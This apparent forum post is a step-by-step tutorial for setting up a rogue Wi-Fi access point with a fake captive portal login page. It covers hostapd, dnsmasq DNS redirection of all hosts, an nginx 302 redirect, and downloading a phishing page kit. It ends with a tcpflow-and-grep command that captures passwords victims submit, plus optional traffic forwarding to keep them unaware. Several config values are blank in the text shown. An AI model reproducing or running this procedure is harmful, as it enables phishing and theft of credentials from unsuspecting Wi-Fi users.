Hack Wifi: Setup Your Fake Access Point

Topic created · 1 Posts · 3 Views
  • alt text

    It often happens that when you connect to a WiFi network, you get a notification or a splash screen that tells you to do something in order to use the WiFi. Usually, you will see a login screen. That screen is called Captive Portal.

    So, what is it? Captive Portal is a small functional web document usually triggered through DNS spoofing & server redirection rules to trick the OS. If successful, the OS will trigger the Captive Portal Login Page.

    Let's see how we can setup a Captive Portal Login Page.

    So, how does a captive portal work? It works through DNS hijacking or Server redirection rules. Every OS has it's own way of detecting the captive portal in place. But mostly, the OS's looks for 302 redirection responses. Let's study each of their responses.


    Windows has it's obfuscated way of detecting captive portal. Usually, it would be one of two sites:



    Android checks for returned response code. For example, if the returned response is 302, the OS will assume it to be the captive portal and trigger it. Usually, it be one of the following:



    Unlike Android & Windows, Apple when sends a request to the site, the site checks for a specific header that may clarify the nature of requested device. Apple requests for urls, usually:


    From iOS 7+, apple uses a specific User-Agent for Captive Portal requests: CaptiveNetworkSupport that can be used to trace Apple devices.

    Let's see how to setup the Captive Portal. We will be using hostapd for access point configuration, dnsmasq for DHCP server and nginx as our hosting web server and redirection rules.

    STEP 1 Installation

    To acheive our objective, we will perform the step as a whole. Install nginx and other required tools and update your repositories:

    $ apt update
    $ apt install hostapd dnsmasq nginx

    Then put your wireless interface in monitor mode:

    $ airmon-ng start wlan1

    STEP 2 Rogue Access Point

    We are about to use hostapd for hosting our Access Point. But this time, with a bit amendment, here's a link for hosting an access point with roguehostapd which infact would make the task more easier by replacing the actual configuration with a few arguments.

    Create and save the hostapd configuration for Access Point:

    $ nano /tmp/hostapd.conf
    ssid=[Fake AP Name] 
    channel=[Fake AP Channel]

    Start hostapd service:

    $ hostapd /tmp/hostapd.conf

    alt text

    STEP 3 DHCP Server

    Now, we need a DHCP server to setup a small network provide the connecting users with ip addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

    $ nano /tmp/dnsmasq.conf

    Up here in the configuration we used a field address. What it does is redirect all the ip addresses and hosts to a single ip as provided and in our case it is the gateway address where our forged website will reside:


    Just in case you want to redirect only a few sites, you will have to explicitly define each site individually followed by slash and the site to be followed. This way is used when you are willing to provide internet access to the users. For example:


    But we don't want it here for we want to give maximum redirects. It's because we don't know a user is going to request which site. So, why don't redirect all?

    Start dnsmasq service:

    $ dnsmasq -C /tmp/dnsmasq.conf -d

    alt text

    Finally, execute these two commands to assign gateway ip and netmask to your interface:

    $ ifconfig wlan1mon up netmask
    $ route add -net netmask gw

    STEP 4 Captive Portal

    Here starts the actual work. Create a new directory to place your website and move to that directory. I would name it captive_portal.

    $ mkdir /var/www/captive_portal
    $ cd /var/www/captive_portal

    Now, download the Rogue AP website and extract the files under this directory:

    $ wget https://www.shellvoide.com/media/files/rogueap.zip
    $ unzip rogueap.zip -d ./

    Now, you would have files placed under your captive_portal directory. All we need now is to setup nginx configuration for our captive portal project. First, remove enabled sites from nginx configuration directory:

    $ rm /etc/nginx/sites-enabled/*

    Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

    $ nano /etc/nginx/sites-enabled/captive_portal
        listen 80;
        root /var/www/captive_portal;        
        location / {
            if (!-f $request_filename){
                return 302 $scheme://;

    What is happening behind in the nginx configuration is whenever a file which doesn't exist is requested by the user, the request will be redirected to our fake page i.e. which is exactly what we are trying to accomplish. You should note that this is the most important part where the non-existent files are being redirected. The directive root specifies the directory where the website is placed. Finally, reload the nginx service:

    $ service nginx reload
    $ service nginx restart

    Check if nginx is correctly serving our fake page:

    $ service nginx status

    alt text

    STEP 5 Capture Password

    Since, we have our servicable access point along with a forged document, we need a way to capture the password credentials. Previously, we used MySQL database to store the data. However, there's even a better approach. Let's do sniffing and capture what is posted in the network. Open a terminal and execute this command:

    $ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

    What is happening is we are capturing the whole network traffic on every interface and then piping it to grep which will look for specific lines. I've set this up according to what will be POSTed when a user will enter password and press Enter on Captive Portal Login page. It will print data on screen when entered on the forged website:

    STEP 6 Internet Forwarding (Optional)

    The last step is to provide our users with internet facility. However to acheive it would be a bit controversial. What we need to do is change or uncomment the address field in dnsmasq configuration. But if we do then Captive Portal will no longer work. So, what to do?

    To overcome this complication, i.e. to provide internet as well as Captive Portal should also be served, the address field is to be explicitly defined for a set of given sites. For example, to only redirect android based operating systems, the address field would be:


    The same could be applied to other websites as well. There are multiple sites which are to be correctly redirected for this. I don't know all of them but some of those famous and widely implemented sites can be configured:


    Then restart dnsmasq with this configuration.

    Finally, we need another interface which have internet connection and the traffic from this interface will be forwarded to the access point interface. I've my this interface named wlan0 from where i will redirect traffic to wlan1mon. Execute the following commands with your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    Now, just one step to go...

    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    It's all setup. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter password in the fields and press enter, the captured data will be printed in tcpflow terminal:

    alt text


    The conclusion that can be drawn from all of the above is users can easily be tricked into performing some unexpected tasks when it comes to wifi. With the help of captive portal login the overall performance and interactivity of the Access Point increases and the attack becomes more surfaced. Above all, the working of captive portal is merely placed upon the principle of redirection.

Log in to reply